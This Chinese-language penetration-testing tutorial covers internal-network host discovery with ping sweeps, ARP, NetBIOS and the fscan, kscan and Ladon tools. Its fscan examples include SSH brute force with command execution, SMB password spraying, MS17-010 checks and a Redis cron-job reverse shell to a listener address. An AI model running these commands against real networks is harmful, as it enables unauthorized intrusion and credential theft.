一.ICMP协议扫描
1.介绍
ICMP是(Internet Control Message Protocol)Internet控制报文协议。它是TCP/IP协议族的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用等网络本身的消息。这些控制消息虽然并不传输用户数据,但是对于用户数据的传递起着重要的作用!
我们日常使用的ping命令的就是利用ICMP协议发送请求回显数据到目标主机!
2.使用ping命令+cmd语法进行C端扫描
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr “TTL=“
使用for循环进行循环ping,利用findstr进行匹配
优点是不会产生大量告警,比较安全!
3. fping工具
使用fping是一个小型命令行工具,用于向网络主机发送ICMP 回应请求,类似于ping,但在ping多个主机时性能要高得多。 fping完全不同于ping,一位可以指定IP数量和网段;
常用方法:
fping ip1 ip2 -c 10
扫描多个IP10次
fping -a -g 192.168.41.0/24
扫描C段IP
二.ARP协议扫描
1.介绍
ARP协议介绍地址解析协议,即ARP(Address Resolution Protocol),是根据IP地址获取物理地址的一个TCP/IP协议;
2.使用ARP命令查看ARP缓存信息
命令: Arp -a
3.使用ARP的工具进行探测
Apr.exe ......
三.NETBIOS协议扫描
1.介绍
NetBIOS协议是由IBM公司开发,主要用于数十台计算机的小型局域网。NetBIOS协议是一种在局域网上的程序可以使用的应用程序编程接口(API),为程序提供了请求低级服务的统一的命令集,作用是为了给局域网提供网络以及其他特殊功能,几乎所有的局域网都是在NetBIOS协议的基础上工作的,在网络中使用计算机名通讯就是使用NetBIOS协议, NetBIOS协议,主要用于局域网通信,开启之后,局域网的其他计算机可以发现并找到你的计算机;
与前俩种协议对比,NTEBIOS协议不仅可以扫描出IP,还可以将IP对应的主机名一起扫描出来!
2.使用工具扫描
命令: nbtscan.exe + ip
四.FSCAN工具扫描
一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。 支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。
项目地址:https://github.com/shadow1ng/fscan
Fsan的用法非常多,可以参考文档介绍,这里只列举几个比较常用的命令
1. fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)
2. fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)
3. fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)
4. fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)
5. fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)
6. fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名密码来进行爆破)
7. fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径)
8. fscan.exe -h 192.168.1.1/8 (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )
9. fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)
10. fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
11. fscan.exe -hf ip.txt (以文件导入)
12. fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)
13. fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量
五. kscan工具扫描
kscan是一款资产测绘工具,可针对指定资产进行端口扫描以及TCP指纹识别和Banner抓取,在
不发送更多的数据包的情况下尽可能的获取端口更多信息。并能够针对扫描结果进行自动化暴
力破解,且是go平台首款开源的RDP暴力破解工具;
项目地址: https://github.com/lcvvvv/kscan
六.Ladon工具扫描
Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。7.5版本内置100个功能模块,外部模块18个,通过多种协议以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、数据库等信息,漏洞检测包含MS17010、SMBGhost、Weblogic、ActiveMQ、Tomcat、Struts2系列等,密码爆破13种含数据库(Mysql、Oracle、MSSQL)、FTP、SSH、VNC、Windows(LDAP、SMB/IPC、NBT、WMI、SmbHash、WmiHash、Winrm)、BasicAuth、Tomcat、Weblogic、Rar等,远程执行命令包含(wmiexe/psexec/atexec/sshexec/jspshell),Web指纹识别模块可识别75种(Web应用、中间件、脚本类型、页面类型)等,可高度自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配置INI批量调用任意外部程序或命令,EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支持Cobalt Strike插件化扫描快速拓展内网进行横向移动!